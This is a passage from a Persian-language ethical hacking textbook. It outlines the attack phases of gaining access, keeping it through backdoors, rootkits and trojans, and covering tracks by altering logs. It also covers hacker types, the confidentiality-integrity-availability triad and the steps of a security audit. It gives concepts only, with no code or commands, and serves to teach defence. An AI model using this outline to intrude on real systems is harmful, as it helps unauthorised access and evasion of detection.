در اﻳﻦ ﻣﺮﺣﻠﻪ، ﺣﻤﻠﻪ واﻗﻌﻲ رخ ﻣﻲ دﻫﺪ . آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺷﻨﺎﺧﺘﻪ ﺷﺪه در ﻣﺮاﺣﻞ ﺷﻨﺎﺳﺎﻳﻲ و اﺳﻜﻦ، اﻛﻨﻮن ﺑﺮاي اﻳﺠﺎد دﺳﺘﺮﺳﻲ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ . روش ارﺗﺒﺎﻃﻲ ﻛﻪ ﻫﻜﺮ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﻣﻲ ﺗﻮاﻧﺪ از ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻣﺤﻠﻲ ( LAN) ، دﺳﺘﺮﺳﻲ ﻣﺤﻠﻲ ﺑﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ ( local) ، اﻳﻨﺘﺮﻧﺖ و ﻳﺎ ﺑﻪ ﺻﻮرت آﻓﻼﻳﻦ ﺑﺎﺷﺪ . از ﻗﺒﻴﻞ session hijacking ، DoS ، و stack-based buffer overflow . در دﻧﻴﺎي ﻫﻜﺮﻫﺎ، اﻳﺠﺎد دﺳﺘﺮﺳﻲ ﺑﺎ ﻧﺎم ﻣﺎﻟﻜﻴﺖ ﺳﻴﺴﺘﻢ ( owning the system ) ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . .

8

ﻣﺮﺣﻠﻪ 4 : ﺣﻔﻆ دﺳﺘﺮﺳﻲ

زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ ﺗﻮاﻧﺴﺖ دﺳﺘﺮﺳﻲ اﻳﺠﺎد ﻛﻨﺪ، ﻣﻲ ﺧﻮاﻫﺪ ﻛﻪ ﺑﺮاي ﺣﻤﻼت ﺑﻌﺪي، دﺳﺘﺮﺳﻲ ﺧﻮد را ﺣﻔﻆ ﻛﻨﺪ . ﮔﺎﻫﻲ اوﻗﺎت، ﻫﻜﺮﻫﺎ، ﺳﻴﺴﺘﻢ را از د ﺳﺘﺮﺳﻲ ﻫﻜﺮﻫﺎي دﻳﮕﺮ اﻣﻦ ﻣﻲ ﻛﻨﻨﺪ آﻧﻬﺎ اﻳﻨﻜﺎر را از ﻃﺮﻳﻖ backdoor ﻫﺎ، rootkit ﻫﺎ، و ﺗﺮوﺟﺎن ﻫﺎ اﻧﺠﺎم ﻣﻲ ﺪﻨدﻫ . زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮي ﺳﻴﺴﺘﻢ را ﺑﻪ ﺗﺼﺮف ﺧﻮد درآورد، ﻣﻲ ﺗﻮاﻧﺪ از آن ﺑﺮاي اﻧﺠﺎم ﺣﻤﻼت دﻳﮕﺮ اﺳﺘﻔﺎده ﻛﻨﺪ . در اﻳﻦ ﺣﺎﻟﺖ، ﺑﻪ آن ﺳﻴﺴﺘﻢ، ﺳﻴﺴﺘﻢ zombie ﮔﻔﺘﻪ ﻣﻲ ﺷﻮد . .

ﻣﺮﺣﻠﻪ 5 : از ﺑﻴﻦ ﺑﺮدن ردﭘﺎ

زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮي ﺗﻮاﻧﺴﺖ ﺑﻪ ﺳﻴﺴﺘﻤﻲ دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﻨﺪ، ﺟﻬﺖ ﺟﻠﻮﮔﻴﺮي از ﺷﻨﺎﺳﺎﻳﻲ ﺗﻮﺳﻂ ﻣﺎﻣﻮران اﻣﻨﻴﺘﻲ، و ﺑﺮاي اداﻣﻪ اﺳﺘﻔﺎده از ﺳﻴﺴﺘﻢ ﻗﺮﺑﺎﻧﻲ، و ﻧﻴﺰ ﭘﺎك ﻛﺮدن ﺷﻮاﻫﺪ ﻫﻚ، اﻗﺪام ﺑﻪ ﭘﺎك ﺳﺎزي ردﭘﺎي ﺧﻮد ﻣﻲ ﻛﻨﺪ . ﻫﻜﺮﻫﺎ ﺳﻌﻲ ﻣﻲ ﻛﻨﻨﺪ ﺗﻤﺎم اﺛﺮات ﺣﻤﻼت از ﻗﺒﻴﻞ ﻓﺎﻳ ﻞ ﻫﺎي log ، ﻳﺎ ﭘﻴﻐﺎم ﻫﺎي ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ( IDS ) را ﭘﺎك ﻛﻨﻨﺪ . ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر از steganography ، ﭘﺮوﺗﻜﻞ ﻫﺎي ﺗﺎﻧﻠﻴﻨﮓ ، و ﺗﻐﻴﻴﺮ ﻓﺎﻳﻞ ﻫﺎي log اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . .

Hacktivisim ﭼﻴﺴﺖ؟

Hacktivisim ، دﻟﻴﻞ و اﻧﮕﻴﺰه ﻫﻚ اﺳﺖ . ﻫﻜﺮﻫﺎ، ﻣﻌﻤﻮﻻ اﻧﮕﻴﺰه ﻫﺎي اﺟﺘﻤﺎﻋﻲ و ﺳﻴﺎﺳﻲ دارﻧﺪ . ﺑﺴﻴﺎري از ﻫﻜﺮﻫﺎ، در ﻓﻌﺎﻟﻴﺖ ﻫﺎﻳﻲ ﭼﻮن deface ﻛﺮدن وب ﺳﺎﻳﺖ، ﻧﻮﺷﺘﻦ وﻳﺮوس، DoS ، ﻳﺎ ﺣﻤﻼت ﻣﺨﺮب دﻳﮕﺮ ﺷﺮﻛﺖ ﻣﻲ ﻛﻨﻨﺪ . ﻣﻌﻤﻮﻻ اﻧﮕﻴﺰه ﻫﻜﺮﻫﺎ ( hacktivism) ، آژاﻧﺲ ﻫﺎي دوﻟﺘﻲ و ﮔﺮوه ﻫﺎي ﺳﻴﺎﺳﻲ ﻫﺴﺘﻨﺪ . .

اﻧﻮاع ﻫﻜﺮﻫﺎ

ﻫﻜﺮﻫﺎ در ﺳﻪ دﺳﺘﻪ ﻗﺮار ﻣﻲ ﮔﻴﺮﻧﺪ : ﻛﻼه ﺳﻔﻴﺪﻫﺎ، ﻛﻼه ﺳﻴﺎه ﻫﺎ، و ﻛﻼه ﺧﺎﻛﺴﺘﺮي ﻫﺎ . ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ ﻣﻌﻤﻮﻻ در دﺳﺘﻪ ﻛﻼه ﺳﻔﻴﺪﻫﺎ ﻗﺮار ﻣﻲ ﮔﻴﺮﻧﺪ اﻣﺎ ﮔﺎﻫﻲ اوﻗﺎت ، ﻛﻼه ﺧﺎﻛﺴﺘﺮي ﻣﻲ ﺷﻮﻧﺪ . . 9

ﻛﻼه ﺳﻔﻴﺪﻫﺎ: اﻳﻨﻬﺎ اﻓﺮادي ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ ﻛﻪ از ﻣﻬﺎرت ﻫﻚ ﺷﺎن ﺑﺮاي اﻫﺪاف دﻓﺎﻋﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﻫﻜﺮﻫﺎي ﻛﻼه ﺳﻔﻴﺪ، ﻣﻌﻤﻮﻻ ﻣﺘﺨﺼﺼﺎن اﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ ﻛﻪ داﻧﺶ و اﺑﺰارﻫﺎي ﻫﻚ را دارﻧﺪ و از آﻧﻬﺎ ﺑﺮاي ﻛﺸﻒ ﻧﻘﺎط ﺿﻌﻒ و اﻗﺪاﻣﺎت ﭘﻴﺸﮕﻴﺮي اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . .

ﻛﻼه ﺳﻴﺎه :ﻫﺎ اﻳﻨﻬﺎ اﻓﺮاد ﺑﺪي ﻫﺴﺘﻨﺪ . ﻫﻜﺮﻫﺎي ﺷﺮور ﻳﺎ cracker ﻫﺎ از ﻣﻬﺎرﺗﺸﺎن ﺑﺮاي اﻫﺪاف ﻏﻴﺮ ﻗﺎﻧﻮﻧﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . آﻧﻬﺎ ﻳﻜﭙﺎرﭼﮕﻲ ﻣﺎﺷﻴﻦ ﻣﻮرد ﻧﻈﺮ را ﺑﻪ ﻗﺼﺪ ﺷﻮم ﻣﻲ ﺷﻜﻨﻨﺪ . ﺑﺎ داﺷﺘﻦ دﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎز، ﻫﻜﺮﻫﺎي ﻛﻼه ﺳﻴﺎه ﻣﻲ ﺗﻮاﻧﻨﺪ داده ﻫﺎي ﺣﻴﺎﺗﻲ و ﻣﻬﻢ را ﺧﺮاب ﻛﻨﻨﺪ، ﺳﺮوﻳﺲ ﻫﺎي ﻛﺎرﺑﺮ ان را ﻣﺨﺘﻞ ﻛﻨﻨﺪ و ﺑﺎﻋﺚ ﺑﺮوز ﻣﺸﻜﻼت ﺑﺮاي آﻧﻬﺎ ﺷﻮﻧﺪ . اﻳﻦ دﺳﺘﻪ از ﻫﻜﺮﻫﺎ، ﺑﻪ راﺣﺘﻲ از ﻫﻜﺮﻫﺎي ﻛﻼ ه ﺳﻔﻴﺪ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻫﺴﺘﻨﺪ . .

ﻛﻼه ﺧﺎﻛﺴﺘﺮي ﻫﺎ : اﻳﻨﻬﺎ ﻫﻜﺮﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺴﺘﻪ ﺑﻪ ﺷﺮاﻳﻂ، ﻣﻤﻜﻦ اﺳﺖ ﺑﺼﻮرت دﻓﺎﻋﻲ ﻳﺎ ﻣﺨﺮب ﻋﻤﻞ ﻛﻨﻨﺪ . ﻳﻌﻨﻲ ﻣﻤﻜﻦ اﺳﺖ ﻫﻢ ﺑﻪ ﻧﻴﺖ ﺧﻮب از داﻧﺶ ﺧﻮد اﺳﺘﻔﺎده ﻛﻨﻨﺪ و ﻫﻢ ﺑﻪ ﻧﻴﺖ ﺷﻮم ( ﺣﺰب ﺑﺎد ). ).

ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ و cracker ﻫﺎ ﻛﻴﺴﺘﻨﺪ؟

ﺧﻴﻠﻲ از ﻣﺮدم ﻣﻲ ﭘﺮﺳﻨﺪ " ﻣﮕﺮ ﻫﻚ ﻣﻲ ﺗﻮاﻧﺪ اﺧﻼﻗﻲ ﺑﺎﺷﺪ؟" ﺑﻠﻪ ! ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧ ﻤﻨﺪ ﻣﻌﻤﻮﻻ در اﻣﻨﻴﺖ ﻳﺎ ﺗﺴﺖ ﻫﺎي ﻧﻔﻮذ در ﺷﺒﻜﻪ ، ﺣﺮﻓﻪ اي ﻫﺴﺘﻨﺪ و از ﻣﻬﺎرت ﻫﺎ و اﺑﺰارﻫﺎي ﻫﻚ ﺷﺎن ﺑﺮاي اﻫﺪاف دﻓﺎﻋﻲ و ﭘﻴﺸﮕﻴﺮاﻧﻪ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ ﻛﻪ ﻣﺘﺨﺼﺼﺎن اﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ، اﻣﻨﻴﺖ ﺷﺒﻜﻪ و ﺳﻴﺴﺘﻢ را ﺑﺮ اي ﻗﺎﺑﻠﻴﺖ آﺳﻴﺐ ﭘﺬﻳﺮي، ﺑﺎ اﺳﺘﻔﺎده از ﺑﻌﻀﻲ اﺑﺰارﻫﺎﻳﻲ ﻛﻪ ﻫﻜﺮﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺮاي ﺑﻪ ﺧﻄﺮ اﻧﺪاﺧﺘﻦ ﺷﺒﻜﻪ اﺳﺘﻔﺎده ﻛﻨﻨﺪ، ﺗﺴﺖ ﻣﻲ ﻛﻨﻨﺪ . .

ﻛﻠﻤﻪ cracker ، ﻫﻜﺮي را ﺗﻮﺻﻴﻒ ﻣﻲ ﻛﻨﺪ ﻛﻪ از ﻣﻬﺎرتﻫﺎ و اﺑﺰارﻫﺎي ﻫﻚ ﺑﺮاي اﻫﺪاﻓﻲ ﻫﻤﭽﻮن اﻧﺘﺸﺎر وﻳﺮوس ﻳﺎ اﻧﺠﺎم ﺣﻤﻼت DoS اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺳﻴﺴﺘﻢ ﻫﺎ ﻳﺎ ﺷﺒﻜﻪ ﻫﺎ را ﺑﻪ ﺧﻄﺮ ﺑﻴﺎﻧﺪازد . در اﺻﻞ، ﻛﻠﻤﻪ ﻫﻜﺮ ﺑﺮاي ﻋﻼﻗﻤﻨﺪ ﺑﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﻫﻜﺮ ﻛﺴﻲ اﺳﺖ ﻛﻪ از داﻧﺴﺘﻦ ﻛﺎر ﻳﻚ ﺳﻴﺴﺘﻢ، ﻛﺎﻣﭙﻴﻮﺗﺮ و ﺷﺒﻜﻪ ﻛﺎﻣﭙﻴﻮﺗﺮي ﻟﺬت ﻣﻲ ﺑﺮد . در ﻃﻮل زﻣﺎن، ﻣﺮدم ﻫﻜﺮﻫﺎ را ﺑﻪ ﻋﻨﻮان ﻛﺴ ﺎﻧ ﻲ ﻛﻪ ﺑﻪ ﻧﻴﺖ ﺷﻮم ﻛﺎﻣﭙﻴﻮ ﺗﺮﻫﺎ را ﻣﻲ ﺷﻜﻨﻨﺪ اﻃﻼق ﻣﻲ ﻛﺮدﻧﺪ . ﺳﭙﺲ واژه cracker راﻳﺞ ﺷﺪ ﻛﻪ ﻛﻮﺗﺎه ﺷﺪه ﻋﺒﺎرت criminal hacker ( ﻫﻜﺮ ﻣﺠﺮم ) اﺳﺖ ﻛﻪ ﺑﻪ دﻧﺒﺎل اﻳﻦ اﺳﺖ ﻛﻪ اﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ را ﺑﺪون اﺟﺎزه ﺑﺸﻜﻨﺪ . ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ ( ethical hacker ) ﺷﺨﺼﻲ اﺳﺖ ﻛﻪ ﺗﺴﺖ ﻫﺎ ي اﻣﻨﻴﺘﻲ و دﻳﮕﺮ ارزﻳ ﺎﺑﻲ ﻫﺎ ﻫﺎ ﺎﺑ ﻲ را اﻧﺠﺎم ﻣﻲ دﻫﺪ ﺗ ﺎ ﺑﻪ ﺳﺎزﻣﺎن ﻫﺎ ﻛﻤﻚ ﻛﻨﺪ زﻳﺮﺳﺎﺧﺖ ﻫﺎﻳ ﺸﺎن را اﻣﻦ ﻛﻨﻨﺪ . ﺑﻌﻀﻲ وﻗﺖ ،ﻫﺎ ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ ﺑﻪ ﻋﻨﻮان ﻫﻜﺮﻫﺎي ﻛﻼه ﺳﻔﻴﺪ ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮﻧﺪ . .

10

اﻫﺪاف ﺣﻤﻠﻪ ﻛﻨﻨﺪه ﻫﺎ ﻫﺎ

اﻣﻨﻴﺖ ﺷﺎﻣﻞ ﺳﻪ ﻋﻨﺼﺮ ﭘﺎﻳﻪ اي اﺳﺖ : :

• ﻣﺤﺮﻣﺎﻧﮕﻲ ( Confidentiality) • ﻳﻜﭙﺎرﭼﮕﻲ ( Integrity) • در دﺳﺘﺮس ﺑﻮدن ( Availability)

ﻫﺪف ﻫﻜﺮ، اﺳﺘﻔﺎده از آﺳﻴﺐ ﭘﺬﻳﺮي ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ اﺳﺖ ﺗﺎ ﺿﻌﻒ ﻫﺎي ﻳﻜﻲ از اﻳﻦ ﭘﺎﻳﻪ ﻫﺎ را در ﺳﻴﺴﺘﻢ ﻫﺪف ﭘﻴﺪا ﻛﻨﺪ . ﻫﻜﺮ در اﻧﺠﺎم ﺣﻤﻠﻪ DoS ، ﻋﻨﺼﺮ دﺳﺘﺮﺳﻲ ﺳﻴﺴﺘﻢ ﻫﺎ و ﺷﺒﻜﻪ ﻫﺎ را ﻣﻮرد ﺣﻤﻠﻪ ﻗﺮار ﻣﻲ دﻫﺪ . ﻫﺮ ﭼﻨﺪ ﻛﻪ ﺣﻤﻠﻪ DoS ﻣﻲ ﺗﻮاﻧﺪ ﺷﻜﻞ ﻫﺎي ﻣﺨﺘﻠﻔﻲ داﺷﺘﻪ ﺑﺎﺷﺪ، ﻫﺪف اﺻﻠﻲ اﻳﻦ اﺳﺖ ﻛﻪ از ﻣﻨﺎﺑﻊ و ﭘﻬﻨﺎي ﺑﺎﻧﺪ اﺳﺘﻔﺎده ﺷﻮد . در اﻳﻦ ﺣﻤﻠﻪ، ﺑﺎ ﺳﺮازﻳﺮ ﻛﺮدن ﻐﭘﻴ ﺎم ﻫﺎي ورودي ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺪف، آن را ﻣﺠﺒﻮر ﺑﻪ ﺧﺎﻣﻮﺷﻲ ﻣﻲ ﻛﻨﺪ در ﻧﺘﻴﺠﻪ ﺳﺮوﻳﺲ ﻛﺎرﺑﺮان ﻣﺨﺘﻞ ﻣﻲ ﺷﻮد . .

ﺳﺮﻗﺖ اﻃﻼﻋﺎت، از ﻗﺒﻴﻞ ﺳﺮﻗﺖ ﭘﺴﻮردﻫﺎ ﻳﺎ داده ﻫﺎي دﻳﮕﺮ ﻛﻪ ﺑﺼﻮرت رﻣﺰ ﻧﺸﺪه در ﺷﺒﻜﻪ ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ، ﺑ ﺮاي ﺣﻤﻠﻪ ﻫﺎي ﻣﺤﺮﻣﺎﻧﮕﻲ، ﺑﺎﻟﻘﻮه ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ ﺑﻪ دﻳﮕﺮان اﺟﺎزه دﺳﺘﺮﺳﻲ ﺑﻪ داده ﻫﺎ را ﻣﻲ ﺪﻨدﻫ . ﻓﻘﻂ داده ﻫﺎي روي ﺷﺒﻜﻪ ﻫﺎ ﻧﻴﺴﺘﻨﺪ ﻛﻪ در ﻣﻌﺮض ﺳﺮﻗﺖ ﻗﺮار دارﻧﺪ ﺑﻠﻜﻪ ﻟﭗ ﺗﺎپ ﻫﺎ، دﻳﺴﻚ ﻫﺎ، و ﻧﻮارﻫﺎي ﭘﺸﺘﻴﺒﺎن ﻧﻴﺰ ﻫﻤﮕﻲ در ﻣﻌﺮض ﺧﻄﺮ ﻗﺮار دارﻧﺪ . .

ﺣﻤﻼت ﻣﻌﻜﻮس ﻛﺮدن وﺿﻌﻴﺖ ﺑﻴﺖ ( bit-flipping) ، ﺣﻤﻼﺗﻲ ﺑﺮاي ﻳﻜﭙﺎرﭼﮕﻲ ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ ﻣﻤﻜﻦ اﺳﺖ داده ﻫﺎ ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﻣﺪﻳﺮان ﺳﻴﺴﺘﻢ ﻫﺎ ﻧﻤﻲ ﺗﻮاﻧﻨﺪ ﺗﺸﺨﻴﺺ دﻫﻨﺪ ﻛﻪ آﻳﺎ داده ،ﻫﺎ ﻫﻤﺎن ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ارﺳﺎل ﻛﻨﻨﺪه ارﺳﺎل ﻛﺮده اﺳﺖ ﻳﺎ ﻧﻪ . .

ﻫﻚ ﻛﺮدن، ﺷﻜﺴﺘﻦ ﻳﻜﻲ از اﻳﻦ ﭘﺎﻳﻪ ﻫﺎﺳﺖ . .

11

ﻣﺜﻠﺚ اﻣﻨﻴﺖ، ﻋﻤﻠﻜﺮد، و راﺣﺘﻲ اﺳﺘﻔﺎده

ﻫﻴﭽ ﻜﺲ ﭘﻮل ﻧﺎﻣﺤﺪود ﺑﺮاي اﻣﻦ ﻛﺮدن ﻫﻤﻪ ﭼﻴﺰ ﻧﺪارد و ﻣﺎ ﻧ ﻤﻲ ﺗﻮاﻧﻴﻢ روﻳﻜﺮد ﻛﺎﻣﻼ اﻣﻨﻲ داﺷﺘﻪ ﺑﺎﺷﻴﻢ . ﻳﻚ روش ﺑﺮاي اﻣﻦ ﻛﺮدن ﺳﻴﺴﺘﻢ از ﺣﻤﻠﻪ ﺷﺒﻜﻪ اي، ﺟﺪا ﻛﺮدن ﻛﺎﺑﻞ ﺷﺒﻜﻪ آن ﻛﺎﻣﭙﻴﻮﺗﺮ اﺳﺖ در اﻳﻨﺼﻮرت اﻳﻦ ﺳﻴﺴﺘﻢ در ﻣﻘﺎﺑﻞ ﺣﻤﻼت ﻣﺒﺘﻨﻲ ﺑﺮ اﻳﻨﺘﺮﻧﺖ ﻛﺎﻣﻼ ا ﻣﻦ ﺧﻮاﻫﺪ ﺑﻮد اﻣﺎ ﻗﺎﺑﻠﻴﺖ اﺳﺘﻔﺎده از آن ﺑﻪ ﺷﺪت ﻛﺎﻫﺶ ﻣﻲ ﻳﺎﺑﺪ . روﻳﻜﺮد ﻣﺘﻀﺎد آن اﺗﺼﺎل آن ﺑﻪ ﺷﺒﻜﻪ اﻳﻨﺘﺮﻧﺖ و ﻋﺪم اﺳﺘﻔﺎده از ﻫﺮ ﻧﻮع آﻧﺘﻲ وﻳﺮوس، وﺻﻠﻪ ﻫﺎ ي اﻣﻨﻴﺘﻲ و ﻓﺎﻳﺮوال اﺳﺖ ﻛﻪ ﺳﺒﺐ ﻣﻲ ﺷﻮد آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ اﻓﺰاﻳﺶ ﻳﺎﺑﺪ و ﻋﻠﻲ رﻏﻢ اﻓﺰاﻳﺶ ﻗﺎﺑﻠﻴﺖ اﺳﺘﻔﺎده، اﻣﻨﻴﺖ ﺑﻪ ﺷﺪت ﻛﺎﻫﺶ ﻣﻲ ﻳﺎﺑﺪ . ﺑﻨﺎﺑﺮاﻳﻦ، ﻛﺎر ﻣﺘﺨﺼﺺ اﻣﻨﻴﺘﻲ، ﻳﺎﻓﺘﻦ ﺗﻌﺎدﻟﻲ ﺑﻴﻦ اﻣﻨﻴﺖ و دﺳﺘﺮﺳﻲ اﺳﺖ . ﺷﻜﻞ زﻳﺮ اﻳﻦ ﻣﻔﻬﻮم را ﻧﺸﺎن ﻣﻲ دﻫﺪ . .

ﻣﺜﻠﺚ اﻣﻨﻴﺖ، ﻋﻤﻠﻜﺮد، و راﺣﺘﻲ اﺳﺘﻔﺎده

ﺑﺮاي ﻳﺎﻓﺘﻦ ﺗﻌﺎدل، ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺪاﻧﻴﺪ اﻫﺪاف ﺳﺎزﻣﺎﻧﺘﺎن ﭼﻴﺴﺖ، اﻣﻨﻴﺖ ﭼﻴﺴﺖ و ﭼﮕﻮﻧﻪ ﺗﻬﺪ ﻳﺪات را ﺑﺮاي اﻣﻨﻴﺖ اﻧﺪازه ﮔﻴﺮي ﻛﻨﻴﺪ . اﮔﺮ اﻣﻨﻴﺖ زﻳﺎد ﺑﺎﺷﺪ ﺑﻪ ﺗﺪرﻳﺞ ﻛﺎرﺑﺮان ﺑﻪ آن ﺗﻮﺟﻪ ﻧﻤﻲ ﻛﻨﻨﺪ . ﺑﻨﺎﺑﺮاﻳﻦ وﻇﻴﻔﻪ ﻳﻚ ﻣﺘﺨﺼﺺ اﻣﻨﻴﺘﻲ، ﻳﺎﻓﺘﻦ ﺗﻌﺎدل در اﻳﻦ ﻣﺜﻠﺚ اﺳﺖ . .

وﻗﺘﻲ اﻣﻨﻴﺖ از ﻳﻚ ﺣﺪي ﺑﺎﻻﺗﺮ ﻣﻲ رود، ﻛﺎرﺑﺮان آن را ﻧﺎدﻳﺪه ﻣﻲ ﮔﻴﺮﻧﺪ . .

ﺗﺤﻘﻴﻖ آﺳﻴﺐ ﭘﺬﻳﺮي ﭼﻴﺴﺖ؟

ﻓﺮآﻳﻨﺪ ﻛﺸﻒ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ و ﺿﻌﻒ ﻫﺎي ﻃﺮاﺣﻲ اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﺣﻤﻠﻪ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺷﻮد . ﺑﻌﻀﻲ از وب ﺳﺎﻳﺖ ﻫﺎ و اﺑﺰارﻫﺎ ﺑﻪ ﻫﻜﺮﻫﺎ ﻛﻤﻚ ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ ﻧﻘﺎط آﺳﻴﺐ ﭘﺬﻳﺮ ﺳﻴﺴﺘﻢ ﻫﺎ و ﻧﺤﻮه اﺳﺘﻔﺎده از آﻧ ﻬﺎ را ﻛﺸﻒ ﻛﻨﻨﺪ . ﺑﻨﺎﺑﺮاﻳﻦ ﻻزم اﺳﺖ ﻛﻪ ﻣﺪﻳﺮان ﺷﺒﻜﻪ ﻫﺎ، ﺳﻴﺴﺘﻢ ﻫﺎ و ﺷﺒﻜﻪ ﻫﺎﻳﺸﺎن را ﻋﺎري از وﻳﺮوس، ﺗﺮوﺟﺎن و اﻛﺴﭙ ﻠﻮﻳﺖ ﻫﺎ ﻧﮕﻪ دارﻧﺪ . ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺟﺪﻳﺪﺗﺮﻳﻦ ﺗﻬﺪﻳﺪات آﺷﻨﺎ ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﺘﻮاﻧﻨ ﺪ ﺣﻤﻠﻪ را ﺗﺸﺨﻴﺺ دﻫﻨﺪ و از ﺑﺮوز آن ﺟﻠﻮﮔﻴﺮي ﻛﻨﻨﺪ . .

12

ﺑﺮﺧﻲ از وب ﺳﺎﻳﺖ ﻫﺎي ﺗﺤﻘﻴﻖ درﺑﺎره آﺳﻴﺐ ﭘﺬﻳﺮي ﻋﺒﺎرﺗﻨﺪ از : :

http://nvd.nist.gov www.securitytracker.com

www.microsoft.com/security www.securiteam.com www.packetstormsecurity.com www.hackerstorm.com www.hackerwatch.org www.securityfocous.com

www.securitymagazine.com www.milworm.com

روش ﻫﺎي اﺟﺮاي ﻫﻚ ﻗﺎﻧﻮﻧﻤﻨﺪ

ﻣﻌﻤﻮﻻ ﻫﻚ ﻗﺎﻧﻮﻧﻤﻨﺪ ﺑﺼﻮرت ﺳﺎﺧﺖ ﻳﺎﻓﺘﻪ و ﺳﺎزﻣﺎن دﻫﻲ ﺷﺪه و ﺑﻪ ﻋﻨﻮان ﺑﺨﺸﻲ از ﺗﺴﺖ ﻧﻔﻮذ ﻳﺎ ﺑﺎزرﺳﻲ اﻣﻨﻴﺘﻲ اﻧﺠﺎم ﻣﻲ ﺷﻮد . ﻋﻤﻖ ﺗﺴﺖ ﺳﻴﺴﺘﻢ ﻫﺎ و ﺑﺮﻧﺎﻣﻪ ﻫﺎ، ﺑﺴﺘﻪ ﺑﻪ اﻫﻤﻴﺖ و ﻧﻴﺎز ﻣﺸﺘﺮي دارد . .

ﻣﺮاﺣﻞ زﻳﺮ ﺑﺮاي اﻧﺠﺎم ﺑﺎزرﺳﻲ اﻣﻨﻴﺘﻲ ﺑﺮاي ﺳﺎزﻣﺎن اﺳﺖ : :

.1 ﺗﻤﺎس ﺑﺎ ﻣﺸﺘﺮي و ﺑﺤﺚ ﺑﺎ او در ﻣﻮرد ﻧﻴﺎزﻫﺎﻳﻲ ﻛﻪ د ر ﺗﺴﺖ ﺑﺎﻳﺪ ﻣﻮرد ﺗﻮﺟﻪ ﻗﺮار ﮔﻴﺮﻧﺪ .2 آﻣﺎده ﺳﺎزي و اﻣﻀﺎي ﺗﻌﻬﺪﻧﺎﻣﻪ ﻣﻨﻊ اﻓﺸﺎي اﻃ ﻼﻋﺎت ( NDA ) ﺑﺎ ﻣﺸﺘﺮي .3 ﺳﺎزﻣﺎن دﻫﻲ ﺗﻴﻢ ﻫﻚ و آﻣﺎده ﺳﺎزي ﺑﺮﻧﺎﻣﻪ ﺑﺮاي ﺗﺴﺖ .4 اﻧﺠﺎم ﺗﺴﺖ .5 ﺗﺤﻠ ﻴﻞ ﻧﺘﺎﻳﺞ ﺗﺴﺖ و آﻣﺎده ﺳﺎزي ﮔﺰارش .6 اراﺋﻪ ﮔﺰارش ﺑﻪ ﻣﺸﺘﺮي

13

ﺑﺮﻧﺎﻣﻪ ارزﻳﺎﺑﻲ اﻣﻨﻴﺘﻲ

ﺑﺴﻴﺎري از ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ، از ﻣﻬﺎرت اﻣﻨﻴﺘﻲ ﺧﻮد ﺟﻬﺖ ارزﻳﺎﺑﻲ و ﺗﺴﺖ ﻫﺎي ﻧﻔﻮذ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . اﻳﻦ ﺗﺴﺖ ﻫﺎ و ارزﻳﺎﺑﻲ ﻫﺎ، ﺳﻪ ﻣﺮﺣﻠﻪ دارد : :

